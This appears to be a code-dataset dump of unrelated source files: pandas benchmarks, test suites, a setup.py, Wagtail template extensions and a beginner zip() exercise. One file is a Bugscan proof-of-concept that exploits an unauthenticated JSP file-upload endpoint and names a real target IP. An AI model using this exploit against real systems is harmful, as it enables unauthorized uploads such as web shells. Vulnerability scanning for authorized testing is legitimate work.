DATA_POINTS_UNIQUE_COLS = DATA_SERIES_UNIQUE_TYPES_ID + [
'reporting_date',
'start_date',
'end_date'
]
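# Illustrative lookups (added for clarity, not in the original file):
# REGION_LEVELS['province'] == 4, ENTITY_KEY_TO_TYPE['region_id'] == 'regions', and
# DATA_POINTS_UNIQUE_COLS appends the three date columns to the data-series id keys above.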
| [] |
CitizenB/pandas | asv_bench/benchmarks/tslibs/period.py | ee1efb6d923a2c3e5a912efe20a336179614993d | """
Period benchmarks that rely only on tslibs. See benchmarks.period for
Period benchmarks that rely on other parts of pandas.
"""
from pandas import Period
from pandas.tseries.frequencies import to_offset
class PeriodProperties:
params = (
["M", "min"],
[
"year",
"month",
"day",
"hour",
"minute",
"second",
"is_leap_year",
"quarter",
"qyear",
"week",
"daysinmonth",
"dayofweek",
"dayofyear",
"start_time",
"end_time",
],
)
param_names = ["freq", "attr"]
def setup(self, freq, attr):
self.per = Period("2012-06-01", freq=freq)
def time_property(self, freq, attr):
getattr(self.per, attr)
class PeriodUnaryMethods:
params = ["M", "min"]
param_names = ["freq"]
def setup(self, freq):
self.per = Period("2012-06-01", freq=freq)
def time_to_timestamp(self, freq):
self.per.to_timestamp()
def time_now(self, freq):
self.per.now(freq)
def time_asfreq(self, freq):
self.per.asfreq("A")
class PeriodConstructor:
params = [["D"], [True, False]]
param_names = ["freq", "is_offset"]
def setup(self, freq, is_offset):
if is_offset:
self.freq = to_offset(freq)
else:
self.freq = freq
def time_period_constructor(self, freq, is_offset):
Period("2012-06-01", freq=freq)
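# Hedged note (added, not part of the original file): these classes follow the airspeed
# velocity (asv) benchmark convention -- `params` and `param_names` define the parameter
# grid, setup() runs before timing, and methods named time_* are what `asv run` measures.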
| [((35, 19, 35, 50), 'pandas.Period', 'Period', (), '', False, 'from pandas import Period\n'), ((47, 19, 47, 50), 'pandas.Period', 'Period', (), '', False, 'from pandas import Period\n'), ((70, 8, 70, 39), 'pandas.Period', 'Period', (), '', False, 'from pandas import Period\n'), ((65, 24, 65, 39), 'pandas.tseries.frequencies.to_offset', 'to_offset', ({(65, 34, 65, 38): 'freq'}, {}), '(freq)', False, 'from pandas.tseries.frequencies import to_offset\n')] |
csadsl/poc_exp | Bugscan_exploits-master/exp_list/exp-1788.py | e3146262e7403f19f49ee2db56338fa3f8e119c9 | #!/usr/bin/python
#-*- coding: utf-8 -*-
#Refer http://www.wooyun.org/bugs/wooyun-2015-0137140
#__Author__ = 上善若水
#_PlugName_ = whezeip Plugin
#_FileName_ = whezeip.py
def assign(service, arg):
if service == "whezeip":
return True, arg
def audit(arg):
raw = '''
POST /defaultroot/customize/formClassUpload.jsp?flag=1&returnField=null HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: 127.0.0.1/defaultroot/customize/formClassUpload.jsp
Cookie: LocLan=zh_cn; JSESSIONID=zXP1WqCc0h80FSvJNVdnj1fGpTJfh2GphR5GYJnJGLLKKKtJdGJN!-668245681
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------11327923318636
Content-Length: 328
-----------------------------11327923318636
Content-Disposition: form-data; name="photo"; filename="testvul.jsp"
Content-Type: application/octet-stream
testvul_uploadfile_test
-----------------------------11327923318636
Content-Disposition: form-data; name="submit"
上传
-----------------------------11327923318636--
'''
url = arg + 'defaultroot/customize/formClassUpload.jsp?flag=1&returnField=null'
# proxy=('127.0.0.1',1234)
# code, head,res, errcode, _ = curl.curl2(url,proxy=proxy,raw=raw)
code1, head1, res1, errcode1, _url1 = curl.curl2(url,raw=raw)
shell_path = 'defaultroot/devform/customize/' + 'testvul.jsp'
code2, head2, res2, errcode2, _url2 = curl.curl2(arg+shell_path)
if code2 == 200 and 'testvul_uploadfile_test' in res2:
security_hole(url)
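# Clarifying note (added, not in the original exploit): audit() first POSTs a marker
# file (testvul.jsp) through the unauthenticated formClassUpload.jsp endpoint, then
# requests it back from the known upload directory; if the marker text is returned,
# the arbitrary file upload is confirmed and reported via security_hole().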
if __name__ == '__main__':
from dummy import *
audit(assign('whezeip', 'http://218.104.147.71:7001/')[1]) | [] |
thecodingsim/learn-python | 3-working-with-lists/zip_tuples.py | bf8e98f40e73ebf7dcf5641312c2c0296d886952 | # Use zip() to create a new variable called names_and_dogs_names that combines owners and dogs_names lists into a zip object.
# Then, create a new variable named list_of_names_and_dogs_names by calling the list() function on names_and_dogs_names.
# Print list_of_names_and_dogs_names.
owners = ["Jenny", "Alexus", "Sam", "Grace"]
dogs_names = ["Elphonse", "Dr. Doggy DDS", "Carter", "Ralph"]
names_and_dogs_names = zip(owners, dogs_names)
list_of_names_and_dogs_names = list(names_and_dogs_names)
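# For the lists above, the print below shows:
# [('Jenny', 'Elphonse'), ('Alexus', 'Dr. Doggy DDS'), ('Sam', 'Carter'), ('Grace', 'Ralph')]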
print(list_of_names_and_dogs_names) | [] |
abhiomkar/couchdbkit | setup.py | 035062b504b57c1cc6e576be47fb05423fb1ddb3 | # -*- coding: utf-8 -
#
# This file is part of couchdbkit released under the MIT license.
# See the NOTICE for more information.
import os
import sys
if not hasattr(sys, 'version_info') or sys.version_info < (2, 5, 0, 'final'):
raise SystemExit("couchdbkit requires Python 2.5 or later.")
from setuptools import setup, find_packages
from couchdbkit import __version__
setup(
name = 'couchdbkit',
version = __version__,
description = 'Python couchdb kit',
long_description = file(
os.path.join(
os.path.dirname(__file__),
'README.rst'
)
).read(),
author = 'Benoit Chesneau',
author_email = '[email protected]',
license = 'Apache License 2',
url = 'http://couchdbkit.org',
classifiers = [
'Development Status :: 4 - Beta',
'Environment :: Other Environment',
'Intended Audience :: Developers',
'License :: OSI Approved :: Apache Software License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Topic :: Database',
'Topic :: Utilities',
'Topic :: Software Development :: Libraries :: Python Modules',
],
packages = find_packages(exclude=['tests']),
zip_safe = False,
install_requires = [
'restkit>=3.2',
],
entry_points="""
[couchdbkit.consumers]
sync=couchdbkit.consumer.sync:SyncConsumer
eventlet=couchdbkit.consumer.ceventlet:EventletConsumer
gevent=couchdbkit.consumer.cgevent:GeventConsumer
""",
test_suite='noses',
)
| [((42, 15, 42, 47), 'setuptools.find_packages', 'find_packages', (), '', False, 'from setuptools import setup, find_packages\n'), ((22, 12, 22, 37), 'os.path.dirname', 'os.path.dirname', ({(22, 28, 22, 36): '__file__'}, {}), '(__file__)', False, 'import os\n')] |
othercodes/sample-todo-list-hexagonal-achitecture | tests/integration/test_infrastructure_persistence.py | a958c6906d8e777e837c8348c754b637b89a7031 | from typing import Optional
from complexheart.domain.criteria import Criteria
from sqlalchemy import create_engine
from sqlalchemy.engine import Engine
from sqlalchemy.orm import sessionmaker
from to_do_list.tasks.domain.models import Task
from to_do_list.tasks.infrastructure.persistence.relational import RelationalTaskRepository, DBInstaller
db_engine: Optional[Engine] = None
def setup_function():
global db_engine
db_engine = create_engine('sqlite:///:memory:')
DBInstaller(db_engine).install()
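# Note (assumption, not in the original file): the `task_factory` argument used by the
# tests below is expected to be a pytest fixture (e.g. defined in a conftest.py) that
# builds a persistable Task from a dict of attribute overrides.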
def test_repository_should_save_new_task_successfully(task_factory):
session = sessionmaker(bind=db_engine)()
repository = RelationalTaskRepository(session)
task = repository.save(task_factory({}))
assert session.query(Task).get(task.id)
def test_repository_should_find_task_successfully(task_factory):
session = sessionmaker(bind=db_engine)()
repository = RelationalTaskRepository(session)
task = repository.save(task_factory({}))
assert repository.find(task.id)
def test_repository_should_match_task_by_criteria_successfully(task_factory):
session = sessionmaker(bind=db_engine)()
repository = RelationalTaskRepository(session)
for i in range(11):
repository.save(task_factory({'description': 'My task {i}'.format(i=i)}))
tasks = repository.match(
Criteria() \
.filter('description', 'like', '%task 1%') \
.order_by(['id'])
)
for task in tasks:
assert isinstance(task, Task)
assert len(tasks) == 2
def test_repository_should_get_all_tasks_successfully(task_factory):
session = sessionmaker(bind=db_engine)()
repository = RelationalTaskRepository(session)
for i in range(10):
repository.save(task_factory({'description': 'My task {i}'.format(i=i)}))
tasks = repository.all()
for task in tasks:
assert isinstance(task, Task)
assert len(tasks) == 10
| [((16, 16, 16, 51), 'sqlalchemy.create_engine', 'create_engine', ({(16, 30, 16, 50): '"""sqlite:///:memory:"""'}, {}), "('sqlite:///:memory:')", False, 'from sqlalchemy import create_engine\n'), ((23, 17, 23, 50), 'to_do_list.tasks.infrastructure.persistence.relational.RelationalTaskRepository', 'RelationalTaskRepository', ({(23, 42, 23, 49): 'session'}, {}), '(session)', False, 'from to_do_list.tasks.infrastructure.persistence.relational import RelationalTaskRepository, DBInstaller\n'), ((32, 17, 32, 50), 'to_do_list.tasks.infrastructure.persistence.relational.RelationalTaskRepository', 'RelationalTaskRepository', ({(32, 42, 32, 49): 'session'}, {}), '(session)', False, 'from to_do_list.tasks.infrastructure.persistence.relational import RelationalTaskRepository, DBInstaller\n'), ((41, 17, 41, 50), 'to_do_list.tasks.infrastructure.persistence.relational.RelationalTaskRepository', 'RelationalTaskRepository', ({(41, 42, 41, 49): 'session'}, {}), '(session)', False, 'from to_do_list.tasks.infrastructure.persistence.relational import RelationalTaskRepository, DBInstaller\n'), ((60, 17, 60, 50), 'to_do_list.tasks.infrastructure.persistence.relational.RelationalTaskRepository', 'RelationalTaskRepository', ({(60, 42, 60, 49): 'session'}, {}), '(session)', False, 'from to_do_list.tasks.infrastructure.persistence.relational import RelationalTaskRepository, DBInstaller\n'), ((21, 14, 21, 42), 'sqlalchemy.orm.sessionmaker', 'sessionmaker', (), '', False, 'from sqlalchemy.orm import sessionmaker\n'), ((30, 14, 30, 42), 'sqlalchemy.orm.sessionmaker', 'sessionmaker', (), '', False, 'from sqlalchemy.orm import sessionmaker\n'), ((39, 14, 39, 42), 'sqlalchemy.orm.sessionmaker', 'sessionmaker', (), '', False, 'from sqlalchemy.orm import sessionmaker\n'), ((58, 14, 58, 42), 'sqlalchemy.orm.sessionmaker', 'sessionmaker', (), '', False, 'from sqlalchemy.orm import sessionmaker\n'), ((17, 4, 17, 26), 'to_do_list.tasks.infrastructure.persistence.relational.DBInstaller', 'DBInstaller', ({(17, 16, 17, 25): 'db_engine'}, {}), '(db_engine)', False, 'from to_do_list.tasks.infrastructure.persistence.relational import RelationalTaskRepository, DBInstaller\n'), ((47, 8, 47, 18), 'complexheart.domain.criteria.Criteria', 'Criteria', ({}, {}), '()', False, 'from complexheart.domain.criteria import Criteria\n')] |
minervaproject/wagtail-jinja2-extensions | wagtail_jinja2/extensions.py | 708f2f873273312ead80d67c3eff0555f152d072 | from jinja2.ext import Extension
from jinja2 import nodes
from jinja2 import Markup
from wagtail.wagtailadmin.templatetags.wagtailuserbar import wagtailuserbar as original_wagtailuserbar
from wagtail.wagtailimages.models import Filter, SourceImageIOError
class WagtailUserBarExtension(Extension):
tags = set(['wagtailuserbar'])
def parse(self, parser):
call = self.call_method('_render', args=[nodes.ContextReference()])
return nodes.Output([nodes.MarkSafe(call)]).set_lineno(next(parser.stream).lineno)
def _render(self, context):
return Markup(original_wagtailuserbar(context))
class WagtailImagesExtension(Extension):
tags = set(['image'])
def parse(self, parser):
lineno = next(parser.stream).lineno
image_expr = parser.parse_expression()
filter_spec = parser.parse_expression()
if parser.stream.skip_if('name:as'):
output_var_name = parser.parse_expression()
output_var_name = nodes.Const(output_var_name.name)
else:
output_var_name = nodes.Const(None)
if output_var_name.value is not None:
return nodes.Assign(nodes.Name(output_var_name.value, 'store'),
self.call_method('_render', [image_expr, filter_spec, output_var_name]))
else:
return nodes.Output([
self.call_method('_render', [image_expr, filter_spec, output_var_name])
]).set_lineno(lineno)
def filter(self, filter_spec):
_filter, _ = Filter.objects.get_or_create(spec=filter_spec)
return _filter
def _render(self, image, filter_spec, output_var_name=None):
if not image:
return ''
try:
rendition = image.get_rendition(self.filter(filter_spec))
except SourceImageIOError:
# It's fairly routine for people to pull down remote databases to their
# local dev versions without retrieving the corresponding image files.
# In such a case, we would get a SourceImageIOError at the point where we try to
# create the resized version of a non-existent image. Since this is a
# bit catastrophic for a missing image, we'll substitute a dummy
# Rendition object so that we just output a broken link instead.
Rendition = image.renditions.model # pick up any custom Image / Rendition classes that may be in use
rendition = Rendition(image=image, width=0, height=0)
rendition.file.name = 'not-found'
if output_var_name:
# store the rendition object in the given variable
return rendition
else:
# render the rendition's image tag now
# resolved_attrs = {}
# for key in self.attrs:
# resolved_attrs[key] = self.attrs[key].resolve(context)
return rendition.img_tag({})
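# Hedged usage sketch (illustration only, not part of the original module): with these
# extension classes registered on the Jinja2 environment, templates can use the tags
# declared in the `tags` sets above, e.g.
#     {% wagtailuserbar %}
#     {% image page.photo "width-400" %}
#     {% image page.photo "fill-80x80" as thumb %} <img src="{{ thumb.url }}">
# `page.photo` and the filter specs are hypothetical values; `thumb` holds the rendition.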
| [((42, 21, 42, 67), 'wagtail.wagtailimages.models.Filter.objects.get_or_create', 'Filter.objects.get_or_create', (), '', False, 'from wagtail.wagtailimages.models import Filter, SourceImageIOError\n'), ((17, 22, 17, 54), 'wagtail.wagtailadmin.templatetags.wagtailuserbar.wagtailuserbar', 'original_wagtailuserbar', ({(17, 46, 17, 53): 'context'}, {}), '(context)', True, 'from wagtail.wagtailadmin.templatetags.wagtailuserbar import wagtailuserbar as original_wagtailuserbar\n'), ((29, 30, 29, 63), 'jinja2.nodes.Const', 'nodes.Const', ({(29, 42, 29, 62): 'output_var_name.name'}, {}), '(output_var_name.name)', False, 'from jinja2 import nodes\n'), ((31, 30, 31, 47), 'jinja2.nodes.Const', 'nodes.Const', ({(31, 42, 31, 46): 'None'}, {}), '(None)', False, 'from jinja2 import nodes\n'), ((34, 32, 34, 74), 'jinja2.nodes.Name', 'nodes.Name', ({(34, 43, 34, 64): 'output_var_name.value', (34, 66, 34, 73): '"""store"""'}, {}), "(output_var_name.value, 'store')", False, 'from jinja2 import nodes\n'), ((13, 49, 13, 73), 'jinja2.nodes.ContextReference', 'nodes.ContextReference', ({}, {}), '()', False, 'from jinja2 import nodes\n'), ((14, 29, 14, 49), 'jinja2.nodes.MarkSafe', 'nodes.MarkSafe', ({(14, 44, 14, 48): 'call'}, {}), '(call)', False, 'from jinja2 import nodes\n')] |
XiaoguTech/rta-sandbox | rta/provision/__init__.py | 2783a3ba8920bf64273761ce7392e51c9c8fb1f7 | from rta.provision.utils import *
from rta.provision.passwd import *
from rta.provision.influxdb import *
from rta.provision.grafana import *
from rta.provision.kapacitor import *
| [] |
Pingziwalk/nn_dataflow | nn_dataflow/tests/unit_test/test_network.py | 5ae8eeba4e243df6e9a69127073513a852a62d17 | """ $lic$
Copyright (C) 2016-2020 by Tsinghua University and The Board of Trustees of
Stanford University
This program is free software: you can redistribute it and/or modify it under
the terms of the Modified BSD-3 License as published by the Open Source
Initiative.
This program is distributed in the hope that it will be useful, but WITHOUT ANY
WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A
PARTICULAR PURPOSE. See the BSD-3 License for more details.
You should have received a copy of the Modified BSD-3 License along with this
program. If not, see <https://opensource.org/licenses/BSD-3-Clause>.
"""
import unittest
from nn_dataflow.core import Network
from nn_dataflow.core import Layer, InputLayer, ConvLayer, FCLayer, \
PoolingLayer, EltwiseLayer
class TestNetwork(unittest.TestCase):
''' Tests for Network. '''
# pylint: disable=too-many-public-methods
def setUp(self):
''' Set up. '''
self.network = Network('test_net')
self.network.set_input_layer(InputLayer(3, 224))
self.network.add('c1', ConvLayer(3, 64, 224, 3))
self.network.add('p1', PoolingLayer(64, 7, 32))
self.network.add('f1', FCLayer(64, 1000, 7))
def test_set_input_layer(self):
''' Modifier set_input_layer. '''
network = Network('test_net')
network.set_input_layer(InputLayer(3, 24))
self.assertIsInstance(network.input_layer(), InputLayer)
self.assertEqual(network.input_layer().nofm, 3)
self.assertEqual(network.input_layer().hofm, 24)
self.assertEqual(network.input_layer().wofm, 24)
self.assertEqual(len(network), 0)
def test_set_input_layer_type(self):
''' Modifier set_input_layer type. '''
network = Network('test_net')
with self.assertRaisesRegex(TypeError, 'Network: .*input_layer.*'):
network.set_input_layer(Layer(3, 24))
with self.assertRaisesRegex(TypeError, 'Network: .*input_layer.*'):
network.set_input_layer(ConvLayer(3, 8, 24, 3))
def test_set_input_layer_duplicate(self):
''' Modifier set_input_layer duplicate. '''
network = Network('test_net')
network.set_input_layer(InputLayer(3, 24))
with self.assertRaisesRegex(KeyError, 'Network: .*input.*'):
network.set_input_layer(InputLayer(3, 24))
def test_add(self):
''' Modifier add. '''
self.assertEqual(len(self.network), 3)
self.network.add('f2', FCLayer(64, 2000, 7), prevs='p1')
self.network.add('f3', FCLayer(3000, 1000), prevs=('f1', 'f2'))
self.network.add('e4', EltwiseLayer(1000, 1, 2), prevs=('f1', 'f3'))
self.network.add('f4', FCLayer(1000, 1000), prevs='e4')
self.assertEqual(len(self.network), 7)
def test_add_same_key(self):
''' Modifier add same key. '''
network = Network('test_net')
network.set_input_layer(InputLayer(3, 224))
network.add('c1', ConvLayer(3, 64, 224, 3))
with self.assertRaisesRegex(KeyError, 'Network: .*c1.*'):
network.add('c1', ConvLayer(64, 128, 224, 3))
def test_add_no_input(self):
''' Modifier add no input. '''
network = Network('test_net')
with self.assertRaisesRegex(RuntimeError, 'Network: .*input.*'):
network.add('c1', ConvLayer(3, 64, 224, 3))
def test_add_no_prev(self):
''' Modifier add no prevs. '''
network = Network('test_net')
network.set_input_layer(InputLayer(3, 224))
network.add('c1', ConvLayer(3, 64, 224, 3))
with self.assertRaisesRegex(KeyError, 'Network: .*prev.*p1.*'):
network.add('p1', PoolingLayer(64, 7, 32), prevs='p1')
def test_add_invalid_type(self):
''' Modifier add invalid type. '''
network = Network('test_net')
network.set_input_layer(InputLayer(3, 224))
with self.assertRaisesRegex(TypeError, 'Network: .*Layer.*'):
network.add('c1', (3, 64, 224, 3))
def test_add_unmatch_prev(self):
''' Modifier add unmatch prevs. '''
network = Network('test_net')
network.set_input_layer(InputLayer(3, 224))
network.add('c1', ConvLayer(3, 64, 224, 3))
with self.assertRaisesRegex(ValueError,
'Network: .*c1.*p1.*mismatch fmap.*'):
network.add('p1', PoolingLayer(64, 7, 2))
self.assertEqual(len(network), 1)
with self.assertRaisesRegex(ValueError,
'Network: .*c1.*c2.*mismatch fmap.*'):
network.add('c2', ConvLayer(64, 128, 220, 3))
self.assertEqual(len(network), 1)
with self.assertRaisesRegex(ValueError, 'Network: .*c1.*prev.*p1.*'):
network.add('p1', PoolingLayer(32, 7, 32))
self.assertEqual(len(network), 1)
with self.assertRaisesRegex(ValueError, 'Network: .*c1.*prev.*c2.*'):
network.add('c2', ConvLayer(32, 128, 224, 3))
self.assertEqual(len(network), 1)
network.add('c2', ConvLayer(64, 128, 224, 3))
with self.assertRaisesRegex(ValueError,
r'Network: .*c1 | c2.*prev.*p1.*'):
network.add('p1', PoolingLayer(128, 7, 32), prevs=('c1', 'c2'))
self.assertEqual(len(network), 2)
def test_add_ext(self):
''' Modifier add_ext. '''
self.assertEqual(len(self.network), 3)
self.network.add_ext('e0', InputLayer(3, 24))
self.assertIsInstance(self.network['e0'], InputLayer)
self.assertEqual(self.network['e0'].nofm, 3)
self.assertEqual(self.network['e0'].hofm, 24)
self.assertEqual(self.network['e0'].wofm, 24)
self.network.add_ext('e1', InputLayer(5, (16, 20)))
self.assertIsInstance(self.network['e1'], InputLayer)
self.assertEqual(self.network['e1'].nofm, 5)
self.assertEqual(self.network['e1'].hofm, 16)
self.assertEqual(self.network['e1'].wofm, 20)
self.assertEqual(len(self.network), 3)
def test_add_ext_same_key(self):
''' Modifier add_ext same key. '''
network = Network('test_net')
network.add_ext('e0', InputLayer(3, 24))
with self.assertRaisesRegex(KeyError, 'Network: .*ext.*'):
network.add_ext('e0', InputLayer(3, 24))
def test_add_ext_invalid_type(self):
''' Modifier add_ext invalid type. '''
network = Network('test_net')
with self.assertRaisesRegex(TypeError, 'Network: .*external layer.*'):
network.add_ext('e0', Layer(3, 24))
with self.assertRaisesRegex(TypeError, 'Network: .*external layer.*'):
network.add_ext('e0', ConvLayer(3, 8, 24, 3))
def test_prevs(self):
''' Get prevs. '''
self.network.add('f2', FCLayer(64, 2000, 7), prevs='p1')
self.network.add('f3', FCLayer(3000, 1000), prevs=('f1', 'f2'))
prevs = self.network.prevs('f1')
self.assertTupleEqual(prevs, ('p1',))
prevs = self.network.prevs('f2')
self.assertTupleEqual(prevs, ('p1',))
prevs = self.network.prevs('f3')
self.assertTupleEqual(prevs, ('f1', 'f2'))
def test_prevs_first(self):
''' Get prevs first layer. '''
self.network.add('c2', ConvLayer(3, 3, 224, 1),
prevs=self.network.INPUT_LAYER_KEY)
prevs = self.network.prevs('c1')
self.assertTupleEqual(prevs, (None,))
prevs = self.network.prevs('c2')
self.assertTupleEqual(prevs, (None,))
def test_prevs_input(self):
''' Get prevs input layer. '''
with self.assertRaisesRegex(ValueError, 'Network: .*input.*'):
_ = self.network.prevs(self.network.INPUT_LAYER_KEY)
def test_prevs_ext_next(self):
''' Get prevs next layer of an external layer. '''
self.network.add_ext('e0', InputLayer(3, 224))
self.network.add('n', ConvLayer(6, 3, 224, 1),
prevs=(self.network.INPUT_LAYER_KEY, 'e0'))
prevs = self.network.prevs('n')
self.assertTupleEqual(prevs, (None, 'e0'))
def test_prevs_ext(self):
''' Get prevs external layer. '''
self.network.add_ext('e0', InputLayer(3, 3))
with self.assertRaisesRegex(ValueError, 'Network: .*ext.*'):
_ = self.network.prevs('e0')
def test_nexts(self):
''' Get nexts. '''
self.network.add('f2', FCLayer(64, 2000, 7), prevs='p1')
self.network.add('f3', FCLayer(3000, 1000), prevs=('f1', 'f2'))
self.network.add('e4', EltwiseLayer(1000, 1, 2), prevs=('f1', 'f3'))
self.network.add('f4', FCLayer(1000, 1000), prevs='e4')
nexts = self.network.nexts('p1')
self.assertTupleEqual(nexts, ('f1', 'f2'))
nexts = self.network.nexts('f1')
self.assertTupleEqual(nexts, ('f3', 'e4'))
nexts = self.network.nexts('f2')
self.assertTupleEqual(nexts, ('f3',))
nexts = self.network.nexts('f3')
self.assertTupleEqual(nexts, ('e4',))
def test_nexts_last(self):
        ''' Get nexts last layer. '''
nexts = self.network.nexts('f1')
self.assertTupleEqual(nexts, (None,))
self.network.add('f2', FCLayer(64, 2000, 7), prevs='p1')
nexts = self.network.nexts('f1')
self.assertTupleEqual(nexts, (None,))
nexts = self.network.nexts('f2')
self.assertTupleEqual(nexts, (None,))
def test_nexts_input(self):
''' Get nexts input layer. '''
nexts = self.network.nexts(self.network.INPUT_LAYER_KEY)
self.assertTupleEqual(nexts, ('c1',))
self.network.add('c2', ConvLayer(3, 3, 224, 1),
prevs=self.network.INPUT_LAYER_KEY)
self.network.add('c3', ConvLayer(6, 4, 224, 1),
prevs=(self.network.INPUT_LAYER_KEY, 'c2'))
nexts = self.network.nexts(self.network.INPUT_LAYER_KEY)
self.assertTupleEqual(nexts, ('c1', 'c2', 'c3'))
def test_firsts(self):
''' Get firsts. '''
firsts = self.network.firsts()
self.assertTupleEqual(firsts, ('c1',))
self.network.add('c2', ConvLayer(3, 3, 224, 1),
prevs=self.network.INPUT_LAYER_KEY)
self.network.add('c3', ConvLayer(6, 4, 224, 1),
prevs=(self.network.INPUT_LAYER_KEY, 'c2'))
firsts = self.network.firsts()
self.assertTupleEqual(firsts, ('c1', 'c2'))
self.assertIn('c1', firsts)
self.assertNotIn('c3', firsts)
def test_firsts_ext(self):
''' Get firsts with external layers. '''
self.network.add_ext('e0', InputLayer(3, 224))
self.network.add('c2', ConvLayer(3, 3, 224, 1), prevs=('e0',))
self.network.add('c3', ConvLayer(67, 3, 224, 1), prevs=('e0', 'c1'))
self.network.add('c4', ConvLayer(6, 3, 224, 1),
prevs=(self.network.INPUT_LAYER_KEY, 'e0',))
firsts = self.network.firsts()
self.assertIn('c2', firsts)
self.assertNotIn('c3', firsts)
self.assertIn('c4', firsts)
def test_lasts(self):
''' Get lasts. '''
lasts = self.network.lasts()
self.assertTupleEqual(lasts, ('f1',))
self.network.add('f2', FCLayer(64, 2000, 7), prevs='p1')
lasts = self.network.lasts()
self.assertTupleEqual(lasts, ('f1', 'f2'))
def test_ext_layers(self):
''' Get external layers. '''
self.assertTupleEqual(self.network.ext_layers(), tuple())
self.network.add_ext('e0', InputLayer(3, 224))
self.assertTupleEqual(self.network.ext_layers(), ('e0',))
self.network.add_ext('e1', InputLayer(3, 224))
self.assertTupleEqual(self.network.ext_layers(), ('e0', 'e1'))
def test_contains(self):
''' Whether contains. '''
self.assertIn('c1', self.network)
self.assertIn('p1', self.network)
self.assertIn('f1', self.network)
self.assertNotIn('f2', self.network)
self.network.add('f2', FCLayer(64, 2000, 7), prevs='p1')
self.assertIn('f2', self.network)
def test_len(self):
''' Accessor len. '''
self.assertEqual(len(self.network), 3)
network = Network('test_net')
self.assertEqual(len(network), 0)
network.set_input_layer(InputLayer(3, 224))
self.assertEqual(len(network), 0)
network.add('c1', ConvLayer(3, 4, 224, 1))
self.assertEqual(len(network), 1)
self.network.add('f2', FCLayer(64, 2000, 7), prevs='p1')
self.assertEqual(len(self.network), 4)
self.network.add('f3', FCLayer(3000, 1000), prevs=('f1', 'f2'))
self.assertEqual(len(self.network), 5)
self.network.add('e4', EltwiseLayer(1000, 1, 2), prevs=('f1', 'f3'))
self.assertEqual(len(self.network), 6)
self.network.add('f4', FCLayer(1000, 1000), prevs='e4')
self.assertEqual(len(self.network), 7)
def test_iter(self):
''' Accessor iter. '''
num = 0
for layer in self.network:
self.assertIn(layer, self.network)
self.assertIsInstance(self.network[layer], Layer)
num += 1
self.assertEqual(len(self.network), num)
network = Network('test_net')
network.set_input_layer(InputLayer(3, 224))
with self.assertRaises(StopIteration):
_ = next(iter(network))
def test_contains_ext(self):
''' Whether contains external layer. '''
self.assertNotIn('e0', self.network)
self.network.add_ext('e0', InputLayer(3, 224))
self.assertIn('e0', self.network)
def test_len_ext(self):
''' Accessor len external layer. '''
self.assertEqual(len(self.network), 3)
self.network.add_ext('e0', InputLayer(3, 224))
self.assertEqual(len(self.network), 3)
def test_iter_ext(self):
''' Accessor iter external layer. '''
self.network.add_ext('e0', InputLayer(3, 224))
for layer in self.network:
self.assertNotEqual(layer, 'e0')
def test_getitem(self):
''' Accessor getitem. '''
self.assertIsInstance(self.network['c1'], ConvLayer)
self.assertIsInstance(self.network['p1'], PoolingLayer)
self.assertIsInstance(self.network['f1'], FCLayer)
def test_getitem_error(self):
        ''' Accessor getitem with an unknown layer key. '''
with self.assertRaisesRegex(KeyError, 'Network: .*c2.*'):
_ = self.network['c2']
def test_str(self):
''' Accessor str. '''
string = str(self.network)
for layer in self.network:
self.assertIn(layer, string)
| [((29, 23, 29, 42), 'nn_dataflow.core.Network', 'Network', ({(29, 31, 29, 41): '"""test_net"""'}, {}), "('test_net')", False, 'from nn_dataflow.core import Network\n'), ((37, 18, 37, 37), 'nn_dataflow.core.Network', 'Network', ({(37, 26, 37, 36): '"""test_net"""'}, {}), "('test_net')", False, 'from nn_dataflow.core import Network\n'), ((47, 18, 47, 37), 'nn_dataflow.core.Network', 'Network', ({(47, 26, 47, 36): '"""test_net"""'}, {}), "('test_net')", False, 'from nn_dataflow.core import Network\n'), ((55, 18, 55, 37), 'nn_dataflow.core.Network', 'Network', ({(55, 26, 55, 36): '"""test_net"""'}, {}), "('test_net')", False, 'from nn_dataflow.core import Network\n'), ((72, 18, 72, 37), 'nn_dataflow.core.Network', 'Network', ({(72, 26, 72, 36): '"""test_net"""'}, {}), "('test_net')", False, 'from nn_dataflow.core import Network\n'), ((81, 18, 81, 37), 'nn_dataflow.core.Network', 'Network', ({(81, 26, 81, 36): '"""test_net"""'}, {}), "('test_net')", False, 'from nn_dataflow.core import Network\n'), ((88, 18, 88, 37), 'nn_dataflow.core.Network', 'Network', ({(88, 26, 88, 36): '"""test_net"""'}, {}), "('test_net')", False, 'from nn_dataflow.core import Network\n'), ((97, 18, 97, 37), 'nn_dataflow.core.Network', 'Network', ({(97, 26, 97, 36): '"""test_net"""'}, {}), "('test_net')", False, 'from nn_dataflow.core import Network\n'), ((105, 18, 105, 37), 'nn_dataflow.core.Network', 'Network', ({(105, 26, 105, 36): '"""test_net"""'}, {}), "('test_net')", False, 'from nn_dataflow.core import Network\n'), ((152, 18, 152, 37), 'nn_dataflow.core.Network', 'Network', ({(152, 26, 152, 36): '"""test_net"""'}, {}), "('test_net')", False, 'from nn_dataflow.core import Network\n'), ((160, 18, 160, 37), 'nn_dataflow.core.Network', 'Network', ({(160, 26, 160, 36): '"""test_net"""'}, {}), "('test_net')", False, 'from nn_dataflow.core import Network\n'), ((318, 18, 318, 37), 'nn_dataflow.core.Network', 'Network', ({(318, 26, 318, 36): '"""test_net"""'}, {}), "('test_net')", False, 'from nn_dataflow.core import Network\n'), ((343, 18, 343, 37), 'nn_dataflow.core.Network', 'Network', ({(343, 26, 343, 36): '"""test_net"""'}, {}), "('test_net')", False, 'from nn_dataflow.core import Network\n'), ((30, 37, 30, 55), 'nn_dataflow.core.InputLayer', 'InputLayer', ({(30, 48, 30, 49): '(3)', (30, 51, 30, 54): '(224)'}, {}), '(3, 224)', False, 'from nn_dataflow.core import Layer, InputLayer, ConvLayer, FCLayer, PoolingLayer, EltwiseLayer\n'), ((31, 31, 31, 55), 'nn_dataflow.core.ConvLayer', 'ConvLayer', ({(31, 41, 31, 42): '(3)', (31, 44, 31, 46): '(64)', (31, 48, 31, 51): '(224)', (31, 53, 31, 54): '(3)'}, {}), '(3, 64, 224, 3)', False, 